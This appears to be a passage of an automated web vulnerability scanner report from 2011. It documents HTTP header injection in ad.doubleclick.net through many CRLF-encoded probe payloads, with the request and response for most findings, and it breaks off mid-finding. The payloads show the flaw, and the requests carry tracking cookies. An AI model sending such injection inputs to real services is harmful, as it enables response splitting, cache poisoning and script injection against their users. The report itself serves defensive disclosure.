HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the cr request parameter is copied into the Location response header. The payload 62d6c%0d%0a28a2bbf9b55 was submitted in the cr parameter. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 5680c%0d%0ad2c6a305f31 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5680c%0d%0ad2c6a305f31/N1558.advertising.com/B3897970.13 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5680c d2c6a305f31/N1558.advertising.com/B3897970.13: Date: Sun, 20 Mar 2011 14:02:54 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 517d7%0d%0abe153345509 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /517d7%0d%0abe153345509/N3340.247realmedia.com/B5245409.18 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/517d7 be153345509/N3340.247realmedia.com/B5245409.18: Date: Sun, 20 Mar 2011 14:02:49 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3c518%0d%0a7d2282ed865 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3c518%0d%0a7d2282ed865/N3340.247realmedia.com/B5245409.19 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3c518 7d2282ed865/N3340.247realmedia.com/B5245409.19: Date: Sun, 20 Mar 2011 14:02:52 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 26b0e%0d%0af869cd452cc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /26b0e%0d%0af869cd452cc/N4518.247RealMedia/B4955444.24 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/26b0e f869cd452cc/N4518.247RealMedia/B4955444.24: Date: Sun, 20 Mar 2011 14:02:54 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3c58d%0d%0a628d11db449 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3c58d%0d%0a628d11db449/N553.mediamath/B5123370.34 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3c58d 628d11db449/N553.mediamath/B5123370.34: Date: Sun, 20 Mar 2011 14:02:49 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3bcb6%0d%0acf011614d08 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3bcb6%0d%0acf011614d08/N553.mediamath/B5123370.3945 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3bcb6 cf011614d08/N553.mediamath/B5123370.3945: Date: Sun, 20 Mar 2011 14:02:49 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 29fe3%0d%0a2e37f006d1b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /29fe3%0d%0a2e37f006d1b/N553.mediamath/B5123370.4 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/29fe3 2e37f006d1b/N553.mediamath/B5123370.4: Date: Sun, 20 Mar 2011 14:02:49 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 21a2e%0d%0aa0d1ad4b93 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /21a2e%0d%0aa0d1ad4b93/N5823.RealMedia/B5318341.2 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/21a2e a0d1ad4b93/N5823.RealMedia/B5318341.2: Date: Sun, 20 Mar 2011 14:02:54 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 391e6%0d%0a6b197e23966 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /391e6%0d%0a6b197e23966/N5823.RealMedia/B5318341.3 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/391e6 6b197e23966/N5823.RealMedia/B5318341.3: Date: Sun, 20 Mar 2011 14:02:54 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 48649%0d%0a56c26ca962e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /48649%0d%0a56c26ca962e/N5853.3630.1790008898421/B5154579.5 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/48649 56c26ca962e/N5853.3630.1790008898421/B5154579.5: Date: Sun, 20 Mar 2011 14:02:54 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 1fe20%0d%0ab3f9ca0144b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1fe20%0d%0ab3f9ca0144b/oiq.rmx/;otp=11042;tile=1;sz=728x90;ord=123456789? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?qkaAABt0GAD5lIQAAAAAAMnCIQAAAAAAAAAMAAYAAAAAAAcAAgABCXmeHQAAAAAAhIAMAAAAAACRUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAR7bz.dR4wT.2KFyPwvXYP-N6FK5H4co.MzMzMzMz4z9nZmZmZmbWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACydZlOreLOCUCegxsWkKNBD3qTKv.sqDdpKJcgAAAAAA==,,http%3A%2F%2Fwww.therugged.com%2Ffeatured%2Fart-of-surviving-the-pub-crawl-how-to-keep-your-job-relationship-life-and-reputation-intact-on-st-paddy%25e2%2580%2599s-day%2F,Z%3D728x90%26s%3D1602587%26_salt%3D1054132058%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.therugged.com%252Ffeatured%252Fart-of-surviving-the-pub-crawl-how-to-keep-your-job-relationship-life-and-reputation-intact-on-st-paddy%2525e2%252580%252599s-day%252F%26r%3D0,446934ae-52f4-11e0-a330-003048d6d630 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1fe20 b3f9ca0144b/oiq.rmx/;otp=11042;tile=1;sz=728x90;ord=123456789: Date: Sun, 20 Mar 2011 13:32:28 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 259b5%0d%0a64574fded8a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /259b5%0d%0a64574fded8a/N1558.advertising.com/B3897970.13;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000787694/mnum=0000759958/cstr=16369623=_4d85fc08,4560463311,787694%5E759958%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=16369623/optn=64?trg=;ord=4560463311? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 6f74a%0d%0a7f9a02edf99 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6f74a%0d%0a7f9a02edf99/N2524.134426.0710433834321/B4169763.44;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BiQfiHAGGTfi-G8_zlAf68cThD5Wpie8BrYeJ8hLjqLazM_CL0wQQARgBIM-2sAM4AGDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQozMDB4MjUwX2FzyAEJ2gEjaHR0cDovL3d3dy53b290LmNvbS9XaGF0SXNXb290LmFzcHi4AhjAAgXIAuXvxRjgAgDqAhJ3b290LWJsb2cxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA-0C6AOTBOgDqQb1AwQEAMTgBAE&num=1&sig=AGiWqtwPCfylAn4LjFnmamHhqeEpZGvhnw&client=ca-pub-2332856072838068&adurl=;ord=2113777662? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 81349%0d%0a4d98cc89398 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /81349%0d%0a4d98cc89398/N4518.247RealMedia/B4955444.24;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msngames/ros/728x90/jx/ss/a/L27/2030005299/Top1/USNetwork/BCN2011030297_004_Trion/20144021.html/726348573830316934646f4141767949?;ord=2030005299? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 78fec%0d%0a2b886149a26 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /78fec%0d%0a2b886149a26/N5552.152304.TRADINGDESK/B5035357.75;sz=300x250;ord=4368258591177512398?;click=http://r.turn.com/r/tpclick/id/zhUvbgssnzxWTgUAeAABAA/3c/http%3A%2F%2Ftrack1000.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%3FclickData%3DRGcAAEVnAAACVQAA6AEAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAAAAAAAAIAAAA0M0E4QUJGQS03NDk3LTQ3MUEtOUFGNi0yOTc0RDE3RUYzMzUAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA%3D%3D_url%3D/url/; HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.woot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/78fec 2b886149a26/N5552.152304.TRADINGDESK/B5035357.75;sz=300x250;ord=4368258591177512398: Date: Sun, 20 Mar 2011 12:46:47 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 5240a%0d%0a5ca3438309 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5240a%0d%0a5ca3438309/sw.nol/atf_i_s/_hp;sec0=_hp;!category=_hp;!category=pop;pos=atf;tag=adi;mtype=standard;sz=728x90;tile=1;dcopt=ist;u=!category-_hp%7C!category-pop%7Cpos-atf%7Ctag-adi%7Cmtype-standard%7Csz-728x90%7Ctile-1%7Cdcopt-ist;ord=396664395998232060? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.shockwave.com/home.jsp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5240a 5ca3438309/sw.nol/atf_i_s/_hp;sec0=_hp;!category=_hp;!category=pop;pos=atf;tag=adi;mtype=standard;sz=728x90;tile=1;dcopt=ist;u=!category-_hp|!category-pop|pos-atf|tag-adi|mtype-standard|sz-728x90|tile-1|dcopt-ist;ord=396664395998232060: Date: Sun, 20 Mar 2011 12:36:31 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 5ed3d%0d%0a09c2515ade6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5ed3d%0d%0a09c2515ade6/N1558.advertising.com/B3897970.13 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5ed3d 09c2515ade6/N1558.advertising.com/B3897970.13: Date: Sun, 20 Mar 2011 14:02:45 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 5e23e%0d%0abf461379124 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5e23e%0d%0abf461379124/N2524.134426.0710433834321/B4169763.44 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5e23e bf461379124/N2524.134426.0710433834321/B4169763.44: Date: Sun, 20 Mar 2011 14:02:46 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 4f673%0d%0a16eecbefeef was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4f673%0d%0a16eecbefeef/N2524.134426.0710433834321/B4169763.45 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4f673 16eecbefeef/N2524.134426.0710433834321/B4169763.45: Date: Sun, 20 Mar 2011 14:02:45 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3871f%0d%0a88fc0961afc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3871f%0d%0a88fc0961afc/N3175.272756.AOL-ADVERTISING2/B4640114.3 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3871f 88fc0961afc/N3175.272756.AOL-ADVERTISING2/B4640114.3: Date: Sun, 20 Mar 2011 14:02:45 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 2cf7a%0d%0a1b8fd4f06f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2cf7a%0d%0a1b8fd4f06f3/N3340.247realmedia.com/B4872659.91 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2cf7a 1b8fd4f06f3/N3340.247realmedia.com/B4872659.91: Date: Sun, 20 Mar 2011 14:02:44 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 6e309%0d%0ae9f2da89aff was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6e309%0d%0ae9f2da89aff/N3340.247realmedia.com/B5245409.18;sz=300x250;pc=[TPAS_ID];click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msngames/ros/300x250/jx/ss/a/L28/1000160035/x15/USNetwork/BCN2011020355_006_Nissan/Nissan2.17_300.html/726348573830316934646f4141767949?;ord=1000160035? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856443/direct;wi.300;hi.250/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014700000000000000000/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 3e030%0d%0a25c3eca06c7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3e030%0d%0a25c3eca06c7/N3340.247realmedia.com/B5245409.19;sz=728x90;pc=[TPAS_ID];click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msngames/ros/728x90/jx/ss/a/L27/813909198/Top1/USNetwork/BCN2011020355_006_Nissan/Nissan2.17_728.html/726348573830316934646f4141767949?;ord=813909198? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 7a2ff%0d%0a9d4a8ed3156 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
